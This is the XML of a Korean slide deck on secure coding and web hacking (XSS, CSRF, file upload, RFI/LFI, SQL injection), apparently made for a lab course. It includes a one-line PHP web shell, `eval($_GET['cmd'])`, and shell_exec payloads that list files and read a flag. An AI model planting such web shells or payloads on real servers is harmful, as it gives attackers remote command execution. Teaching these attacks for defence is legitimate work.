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7" r:id="rId2"/>
    <p:sldId id="261" r:id="rId3"/>
    <p:sldId id="275" r:id="rId4"/>
    <p:sldId id="264" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="294" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="293" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="269" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="290" r:id="rId22"/>
    <p:sldId id="278" r:id="rId23"/>
    <p:sldId id="289" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="280" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="283" r:id="rId28"/>
    <p:sldId id="285" r:id="rId29"/>
    <p:sldId id="288" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="284" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="296" r:id="rId35"/>
    <p:sldId id="298" r:id="rId36"/>
    <p:sldId id="297" r:id="rId37"/>
    <p:sldId id="299" r:id="rId38"/>
    <p:sldId id="300" r:id="rId39"/>
    <p:sldId id="301" r:id="rId40"/>
    <p:sldId id="302" r:id="rId41"/>
    <p:sldId id="303" r:id="rId42"/>
    <p:sldId id="304" r:id="rId43"/>
    <p:sldId id="307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87" autoAdjust="0"/>
    <p:restoredTop sz="86848"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="63" d="100"/>
          <a:sy n="63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D2E5F-B123-3542-B8C9-D96784A4038E}" type="datetimeFigureOut">
              <a:rPr lang="en-KR" smtClean="0"/>
              <a:t>2021/05/17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0E6F5-AC0E-DC49-AE91-0BAC895E14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84517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/.+/e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“ls”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“cat flag”)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0E6F5-AC0E-DC49-AE91-0BAC895E14C6}" type="slidenum">
              <a:rPr lang="en-KR" smtClean="0"/>
              <a:t>40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83114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0E6F5-AC0E-DC49-AE91-0BAC895E14C6}" type="slidenum">
              <a:rPr lang="en-KR" smtClean="0"/>
              <a:t>43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7437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2021. 5. 17.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84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2021. 5. 17.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98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2021. 5. 17.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2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2021. 5. 17.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28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2021. 5. 17.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2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2021. 5. 17.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90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2021. 5. 17.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83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2021. 5. 17.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14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2021. 5. 17.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4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2021. 5. 17.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36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2021. 5. 17.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04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2021. 5. 17.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50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3919350" y="2719120"/>
            <a:ext cx="6275237" cy="1590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22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시큐어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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코딩 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2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&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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해킹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544362" y="2977884"/>
            <a:ext cx="1080128" cy="108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rgbClr val="E37156"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="직각 삼각형 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2544300" y="2977695"/>
            <a:ext cx="1080253" cy="1080126"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E37156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rgbClr val="E371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806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XSS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AE46758-A93F-F44C-8E33-32C4CB4D869B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3576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XSS ( Cross Site Script)</a:t>
            </a:r>
            <a:endParaRPr lang="en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4F5575-32B7-9B42-8F1E-6807C2A05C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="8372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클라이언트 측에서 실행되는 언어로 작성된 악성 스크립트 코드를</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-KR" dirty="0"/>
              <a:t>웹 페이지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>웹 게시판 또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>클라이언트에게 노출 될 수 있는 페이지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 포함 시켜</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자가 해당 페이지를 실행되게 하는 공격</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="https://s3.amazonaws.com/cdn.freshdesk.com/data/helpdesk/attachments/production/1042051911/original/Diagram-Describing-Blind-XSS-Attack.gif?1465780586">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3D27333-281F-5E40-94BE-8D9482611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940" y="2506014"/>
            <a:ext cx="7818120" cy="447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731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XSS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AE46758-A93F-F44C-8E33-32C4CB4D869B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="440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XSS ( Cross Site Script ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1783110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CSRF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AE46758-A93F-F44C-8E33-32C4CB4D869B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="5463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CSRF ( Cross-Site Request Forgery)</a:t>
            </a:r>
            <a:endParaRPr lang="en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4F5575-32B7-9B42-8F1E-6807C2A05C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="5835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사용자가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>자신의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>의지와는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>무관하게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>공격자가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>의도한</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>행위를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>특정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>웹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>사이트에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>강제로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>요청하게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>만드는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>공격</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9C15F15-E4C0-244F-9CD7-B84DA1393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502" y="2967679"/>
            <a:ext cx="5857738" cy="337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85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CSRF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AE46758-A93F-F44C-8E33-32C4CB4D869B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="6188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CSRF ( Cross-Site Request Forgery) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2381374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381316" y="2322415"/>
            <a:ext cx="9429368" cy="1474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Chapter 3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File Up &amp; Download</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2368320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File Upload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1860267-5D46-D64A-9DC2-42296A16F2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="1843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File Upload</a:t>
            </a:r>
            <a:endParaRPr lang="en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6E68B0-EA14-3947-A3F8-6E8E87F771DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="94392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파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>업로드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>실행가능한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>파일을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>올려</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>임의의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>실행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KR" dirty="0"/>
              <a:t>웹쉘이라고 불리는 해킹 프로그램을 업로드하여 웹 사이트의 서버를 장악 가능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-KR" dirty="0"/>
              <a:t> 공격자가 원격에서 대상 서버에 명령을 실행 할 수 있도록 작성된 웹스크립트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7BAF57-41AD-CE4F-A1E5-BE45119695A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="3532363"/>
            <a:ext cx="2243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PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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E92DF9-28B4-EF43-9D60-7EA1AF599E41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882502" y="4194337"/>
            <a:ext cx="3852914" cy="2220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passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()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system()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eval()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EX) &lt;?php eval($_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’]) ?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1514757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File Upload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1860267-5D46-D64A-9DC2-42296A16F2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="2567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File Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1794113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File Download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67CB406-AAE3-7B44-BC69-AD52027867A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="2279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File Download</a:t>
            </a:r>
            <a:endParaRPr lang="en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96CCC6-D8EA-C342-9542-F1F94463B0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="7071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사용자에게 허용되지 않은 파일을 다운로드 가능하게 하는 취약점</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081567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File Download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67CB406-AAE3-7B44-BC69-AD52027867A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3112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File Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1655249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381316" y="2322415"/>
            <a:ext cx="9429368" cy="1474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Chapter 4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RFI &amp; LFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3989479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149786"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="965199" y="1474678"/>
          <a:ext cx="10248001" cy="5235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0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71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CONTENTS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71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13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SOCKET &amp; BRUTE FORCE &amp; Directory Listing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your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stylish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business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campus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life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3715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●●●●●●●●●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13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XSS &amp; CSRF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your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stylish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business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campus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life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3715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13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File Up &amp; Download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3715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13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LFI &amp; RFI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3715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13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SQL INJECTION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your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stylish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business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campus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life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3715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885328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889000" y="147731"/>
            <a:ext cx="5759864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6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시큐어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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코딩 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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해킹</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="8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3771900" y="1115769"/>
            <a:ext cx="74413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102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RFI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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="4459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RFI ( Remote File Inclusion )</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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B03B43-90F9-B94D-91E8-CCEB2BFC4702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="7592015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KR" dirty="0"/>
              <a:t>파일을 불러오는 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(include, require)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-KR" dirty="0"/>
              <a:t>를 사용할때 서버 설정의 오류로 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-KR" b="1" dirty="0"/>
              <a:t>외부 파일을 로컬 파일처럼 호출 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-KR" dirty="0"/>
              <a:t>할 수 있는 취약점</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92DCACA-C54F-A049-8272-D96EC6B2B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682" y="3900636"/>
            <a:ext cx="5524500" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EBEAC12-8CAE-FA47-BEFD-F9A25759F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69" y="3891111"/>
            <a:ext cx="55435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36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RFI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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="5184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RFI ( Remote File Inclusion ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1134723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RFI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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="3930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LFI ( Local File Inclusion )</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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B03B43-90F9-B94D-91E8-CCEB2BFC4702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="6548588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/>
              <a:t>RFI와</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>같이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>파일을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>불러오는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>함수를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>통해서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>내부에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>민감한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>파일에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>접근</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>취약점</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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767540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RFI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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="4764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LFI ( Local File Inclusion ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333526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381316" y="2322415"/>
